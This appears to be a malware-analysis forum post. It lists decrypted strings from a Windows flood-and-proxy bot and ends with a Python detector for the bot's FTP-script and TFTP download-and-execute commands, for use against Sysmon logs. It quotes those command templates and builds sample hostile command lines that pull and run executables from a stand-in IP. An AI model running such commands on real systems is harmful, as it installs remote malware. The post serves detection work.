[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SOCKS4]: Error: Failed to connect to target, returned: <%d>.
[SOCKS4]: Error: Failed to open socket(), returned: <%d>.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SYN]: Done with flood (%iKB/sec).
[SYN]: Send error: <%d>.
%s [CpU]: %I64uMHz. [RaM] %sKB total, %sKB free. [DiSk] %s total, %s free. [Os] Windows %s (%d.%d, Build %d). [SyS DiR] %s. [HoStNaMe] %s (%s). [CuRrEnT uSeR] %s. [DaTe] %s. [TiMe] %s. [UpTiMe] %s 
dd:MMM:yyyy
couldn't resolve host
%s [TyPe] %s (%s). [Ip AdDrEsS] %s. [HoStNaMe] %s.
LAN
Dial-up
Not connected
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[TCP]: Invalid target IP.
[TCP]: Error: setsockopt() failed, returned: <%d>.
[TCP]: Error: socket() failed, returned: <%d>.
POST / HTTP/1.0
Host: %s
Content-Length: %d
12 SpEeD TeSt 
: Europe[ %d kbit/s] USA[ %d kbit/s] Asia[ %d kbit/s] Average[ %d kbit/s]
http://www.google.co.jp
yahoo.co.jp
http://www.nifty.com
http://www.d1asia.com
http://www.st.lib.keio.ac.jp
http://www.lib.nthu.edu.tw
http://www.google.com
http://www.easynews.com
http://www.above.net
http://www.level3.com
nitro.ucsc.edu
http://www.burst.net
http://www.cogentco.com
http://www.rit.edu
http://www.nocster.com
http://www.verio.com
http://www.stanford.edu
http://www.xo.net
http://www.google.it
de.yahoo.com
http://www.belwue.de
http://www.switch.ch
http://www.1und1.de
verio.fr
http://www.utwente.nl
http://www.schlund.net
12 ThReAdS lIsT 
%s No %s thread found.
%s %s %s stopped. (%d thread(s) stopped.)
For unpacking, the approach described here http://interestingmalware.blogspot.com/ ... runpe.html will work for most of this VB Crypt junk.

Decrypted file attached
Attachments (87.24 KiB), pwd: malware
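Two of the decrypted strings above are the bot's download-and-execute templates: the xp_cmdshell one ("del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq") and the "tftp -i %s get %s &%s" one. Both stand out in process-creation telemetry once you know the shape. The Python below is an added example, not code from the page or from either poster, that flags command lines matching either template and pulls out the drop host, the file name and whether the file is run afterward in the same command line. The sample command lines are constructed for this example; the host and file names in them are made up.

```python
import re

# Constructed process command lines modelled on the bot's two templates,
# plus two benign lines. Host and file names are invented for the example.
SAMPLE_CMDLINES = [
    "cmd.exe /c del eq&echo open 198.51.100.7 21 >> eq&echo user 1 1 >> eq "
    "&echo get svc.exe >> eq &echo quit >> eq &ftp -n -s:eq &svc.exe&del eq",
    "tftp -i 198.51.100.7 get upd.exe &upd.exe",
    "ftp.exe -s:C:\\Users\\alice\\upload.txt ftp.example.net",   # benign scripted ftp
    'powershell.exe -Command "Get-Process"',
]

# "echo open <host> <port> >> <script>", later "echo get <file> >> <script>",
# later "ftp -n -s:<script>", all in one line and all naming the same script.
FTP_SCRIPT_DROP = re.compile(
    r"echo\s+open\s+(?P<host>[^\s&]+)\s+(?P<port>\d+)\s*>>\s*(?P<script>[^\s&]+)"
    r".*?echo\s+get\s+(?P<file>[^\s&]+)\s*>>\s*(?P=script)"
    r".*?\bftp(?:\.exe)?\s+-n\s+-s:(?P=script)",
    re.IGNORECASE | re.DOTALL,
)

# "tftp -i <host> get <file>" (binary-mode pull; the default tftp port is 69).
TFTP_GET_DROP = re.compile(
    r"\btftp(?:\.exe)?\s+-i\s+(?P<host>[^\s&]+)\s+get\s+(?P<file>[^\s&]+)",
    re.IGNORECASE,
)


def _executes(tail, filename):
    """True if the downloaded file is invoked later in the same command line,
    e.g. "&svc.exe" or "&start svc.exe" after the transfer."""
    pattern = r"&\s*(?:start\s+)?" + re.escape(filename) + r"(?:\s|&|$)"
    return re.search(pattern, tail, re.IGNORECASE) is not None


def classify_cmdline(cmdline):
    """Return a finding dict for a download-and-execute pattern, else None."""
    m = FTP_SCRIPT_DROP.search(cmdline)
    if m:
        return {"technique": "ftp-script-drop", "host": m["host"],
                "port": int(m["port"]), "file": m["file"],
                "executes": _executes(cmdline[m.end():], m["file"])}
    m = TFTP_GET_DROP.search(cmdline)
    if m:
        return {"technique": "tftp-get-drop", "host": m["host"],
                "port": 69, "file": m["file"],
                "executes": _executes(cmdline[m.end():], m["file"])}
    return None


def scan(cmdlines):
    """Apply classify_cmdline to each line and keep only the hits."""
    return [f for f in (classify_cmdline(c) for c in cmdlines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding)
```

Feed it the CommandLine field from Sysmon event 1 or 4688 logs; the ftp variant is worth alerting on even without the trailing execution, since a scripted ftp -n -s: pull from a bare IP has few legitimate uses on a workstation or SQL server, and the tftp variant almost none.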